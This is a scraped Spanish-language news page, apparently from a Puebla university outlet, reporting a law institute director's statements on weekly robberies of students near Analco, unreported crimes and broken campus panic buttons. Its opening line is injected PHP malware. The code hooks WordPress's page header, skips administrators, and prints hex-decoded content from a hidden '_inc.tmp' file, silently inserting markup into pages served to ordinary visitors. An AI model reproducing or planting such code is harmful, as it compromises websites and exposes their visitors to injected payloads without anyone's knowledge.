if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estudiantes temen denunciar por temor a represalias: German Molina – La Opinión Universitaria La Opinión Universitaria
Menu

Estudiantes temen denunciar por temor a represalias: German Molina

 

  • Además dio a conocer que los botones de pánico dejaron de funcionar; no hubo aviso por parte de las autoridades, señala

Por Diego Cuautle

Por semana se registran entre 3 y 5 asaltos a estudiantes de las distintas universidades ubicadas en la zona de Analco, dio a conocer el director del Instituto de Ciencias Jurídicas (ICI) de Puebla, German Molina Carrillo, quien comentó que en muchos casos, las victimas no acuden a denunciar ante las autoridades por temor a que los delincuentes puedan tomar represalias.

En rueda de prensa, el académico lamentó que dicha situación se dé a pesar de los esfuerzos y recomendaciones que se hacen para que la gente acuda ante las autoridades, “en muchos de los casos suelen llevarse las credenciales de elector donde se tienen los datos, últimamente los jóvenes están optando por no hacerlas visibles”.

Es por ello que reiteró su llamado a las autoridades municipales a reforzar la seguridad en la zona, incluso comentó que sería viable realizar más patrullajes al fin de ahuyentar a los delincuentes que esperan a los alumnos para asaltarlos.

Aunque destacó que entre los universitarios es creciente la cultura de la denuncia, ya que cuentan con más cantidad de oficinas del ministerio público, lo que permite mayor posibilidad de investigar y de resolver problemas de inseguridad.

Así mismo informó que desde hace algunos días, los botones de pánico que son utilizados por las universidades y que están conectados al C5 dejaron de funcionar por lo que se espera que en breve se puedan reconectar, además de que los reportes a través de teléfono o vía whatsapp puedan ser atendidos con inmediatez.

“Poco se ha usado, yo esperaría que lo más pronto posible en enero se reactiven los botones de alerta, porque si es muy necesario, estamos con el pendiente, ahorita que son vacaciones porque saben que la delincuencia no toma vacaciones, por eso insistimos a la autoridad para que refuerce los rondines”, explicó.

Lamentó que a pesar de que hay un cambio de gobierno y de estrategia las cosas en el tema de la inseguridad se está en las mismas pero confió que con la puesta en marcha de las nuevas patrillas que fueron entregadas por el gobierno del Estado las cosas mejores.

Para ello, recomendó que es necesario que los diferentes órdenes de gobierno trabajen coordinadamente para dar resultados inmediatos.

  • Tweets recientes